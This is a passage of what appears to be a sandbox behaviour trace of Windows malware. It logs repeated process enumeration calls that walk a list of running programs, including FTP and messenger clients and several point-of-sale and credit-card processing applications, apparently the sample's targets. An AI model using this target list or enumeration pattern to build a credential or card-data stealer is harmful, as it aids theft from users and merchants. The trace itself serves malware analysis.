th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0290.235] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0290.237] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0290.238] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0290.240] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0290.242] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0290.243] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0290.245] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0290.247] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0290.248] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0290.250] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0290.252] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0290.253] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0290.255] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0290.256] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0290.258] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0290.260] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0290.261] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0290.312] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x594, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0290.314] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0290.315] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0290.317] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0290.318] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x100c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0290.320] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1018, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0290.321] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1028, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0290.323] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="likely-final-out.exe")) returned 1 [0290.324] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="local reality bank.exe")) returned 1 [0290.340] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="kitchen-box-instead.exe")) returned 1 [0290.342] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1058, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x9dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0290.343] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0290.345] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x127c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0290.346] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0290.348] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0290.349] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0290.350] CloseHandle (hObject=0x2170) returned 1 [0290.351] Sleep (dwMilliseconds=0x64) [0290.489] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2134 [0290.501] Process32First (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0290.504] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x79, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0290.506] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0290.508] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0290.509] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0290.511] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0290.512] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0290.514] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0290.516] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0290.517] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0290.519] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0290.520] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0290.522] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0290.523] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0290.525] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0290.526] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0290.577] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0290.579] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0290.581] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0290.583] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0290.585] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0290.586] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0290.588] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0290.589] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0290.591] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0290.593] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0290.595] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0290.597] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0290.598] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0290.600] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x838, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0290.602] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0290.604] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0290.606] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="studentbecausedemocratic.exe")) returned 1 [0290.607] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="share.exe")) returned 1 [0290.609] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="myself.exe")) returned 1 [0290.610] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="feel.exe")) returned 1 [0290.612] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="action program citizen.exe")) returned 1 [0290.613] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="reachinvolve.exe")) returned 1 [0290.615] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="question.exe")) returned 1 [0290.616] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="play hit.exe")) returned 1 [0290.617] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mean.exe")) returned 1 [0290.619] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xde0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="evening.exe")) returned 1 [0290.620] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="memory everybody nature.exe")) returned 1 [0290.646] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="structurecausebar.exe")) returned 1 [0290.648] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="good.exe")) returned 1 [0290.649] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="item study safe.exe")) returned 1 [0290.650] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="health-prove-opportunity.exe")) returned 1 [0290.652] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="break.exe")) returned 1 [0290.653] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="minute-budget-themselves.exe")) returned 1 [0290.655] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe50, th32DefaultHeapID=0x0, 